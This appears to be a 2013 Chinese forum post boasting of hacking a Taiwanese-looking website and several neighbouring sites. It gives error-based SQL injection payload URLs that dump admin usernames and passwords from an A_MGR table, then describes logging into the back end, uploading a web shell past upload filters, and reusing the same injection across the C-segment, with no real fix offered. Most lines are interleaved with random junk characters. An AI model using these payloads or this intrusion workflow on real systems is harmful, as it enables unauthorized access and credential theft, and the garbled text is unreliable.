发现一个注入点
1 ^0 }' k; g, `* Y$ nhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
- M9 P$ Y" E9 m3 F! E0 Q1 W$ \# s: D* g! z B2 N5 A" S' L: K
习惯性的加’having1=1--' J! l) D& J) H9 B) X
% A' o3 R) ]+ r8 N5 p, V1 S8 ^http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—5 T4 K' s* P" a6 ?4 l e! e6 i9 I
3 B# p2 K0 I4 d& m! _07 y- P0 T+ O8 c3 a
9 a3 d, t1 r# b6 A5 ^$ T; @
爆出Diary_A.dl_Title(这时候很激动啊)
( i" X9 M" f5 c5 U$ q* F& y+ z6 Q. F* ?7 l7 e1 z/ a2 v5 _
那么继续
5 Z# d! _: Z6 f5 g, Qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
. v; y; i8 f( l8 ], o( C6 ^( I# q7 Q! E& h* U' r1 N4 y
继续,一直爆下去
3 D3 {% g& Q* B' y! y0 @7 L: A$ x) Y" T! `+ x% U8 d e
爆到几个字段和表段 但是没找到需要的管理用户的字段8 ^5 u- v& G/ H( O
! g T+ c: G" _- L! C7 g: y! l& H蛋疼了 怎么办 然后去后台登陆页看源码0 o1 F0 a% ?" x E
) z. F, k( _0 \' s
0
; P, [. L- w% F) Z6 d
& V1 N# j% \+ O( b5 TInput name= “ADUID”
3 c4 C) C% O2 b P: BInput name= “ADPWD”
4 y; Q. z: x8 j/ ~7 }! @2 r3 h6 i: N. x* J; E4 J* m! [2 g8 l! X
很幸运 找到了字段那就继续
# n. |' J4 f+ ^6 f5 z+ x0 G找到之后开始爆用户/ m" F+ a& c) D8 h- }
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
0 Q4 J" ? W& p& U爆密码4 k; W( w( E( R+ l) K- w
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—6 o" o! n) _/ |' y" ?
测试了下 这个注入点只能爆到文章哪里的表 ( V$ E+ q) G+ s6 ~7 U9 l3 O5 a
- R) n! K* I, U/ D6 K9 ?头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
4 G! b" x/ L+ o z) ?9 i. B( O7 }+ L' i" T' P9 i' i4 W6 ]
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
! u9 }8 x$ [ w0 P! ^
. {* Z/ r) D+ A$ {0 |; W1 }473, o9 E8 Y& u6 Z
/ `7 T2 @6 `: ]
进后台2 ]$ P( i( r7 k/ ~7 i9 y1 C
0 x6 \! }" w* ?+ |- @- @5 a5 [- M( F% i; H! I# X" f
发现几个上传点 有的地方不能上传 而且防止恶意代码. y0 B! m) ?; Z
2 W$ B% r+ y7 ^: u' h
没办法 各种百度各种找大牛 找到一只好像可以突破的马6 [# R2 d# M6 l+ h# o. B
; N* h, M% R% X; T/ ^' ] e% E; _
' a7 r/ ]9 ~. L
在系统管理那里直接上传 不过没有显示地址/ }* J v f( Y) d
) [% |0 \/ H$ Q# I8 }
再上传一次 抓包 搞定OK
. j! v& M3 Y5 Y+ m! y/ X* d2 T+ x e3 O" L0 ?+ W
3 G' [# V# w+ F4 ?
0 T9 g8 Y0 l0 t) R# p4 i8 D
472 K& p0 W9 S5 K1 {4 u+ Q- G" m
1 e: O, F% N* A$ D% ]晚上不行了 去睡觉。。。! g3 d, D% ]# e
第二天刚起床 闲的没事做继续日站吧
7 \. w# ~2 \: V$ X( N" W; _& Q0 M% D! W, b
找个站 就把这个站的旁c扫了下4 Z4 u! t- |+ m9 [5 w5 b. t
$ J1 L! q. T; J3 H. H7 m0 h! N2 D7 s
发现c段也有一个购物站 ,然后还和这个站的模板差不多2 X. c: i' t* T/ W& s5 J# k! c
* E5 W( [* C7 K8 J- f就找到会员登录口测试1 |8 A5 U, @ |. M# B( g. t( G
- Q8 K6 N9 U1 v: D# F
'and (select top 1 MGR_UID from A_MGR)>0—
5 s2 C) m5 Q& X' I; ?果断爆到了 这时候我很激动 通杀# z1 P7 ^/ H5 j0 C1 d
2 M' d# ^/ O& Z% e0 w' n) S
再次翻c段
G$ T7 a$ a( V6 z& \! ?4 t+ n7 Z/ t, |5 L o4 ^2 Z- z
翻出几个站 都成功拿下
$ V# N# T6 D" d- `. m0 R5 [
: L# u" W/ P6 |: k4 o2 L* y6 k3 \4 I2 [" \ k
7 i4 Q# U5 \7 e2 l修复方案:
5 k+ x3 ~/ D4 f, K* J) C, E F他们比我专业
( Y+ z4 z5 b7 a
3 m9 K( n+ B( u/ L9 c; M+ Y) G" d0 z' j9 L; c4 i
: t2 R) k6 f. M3 B$ s! U0 G |
发表于 2013-4-4 17:40:38
收藏
支持
反对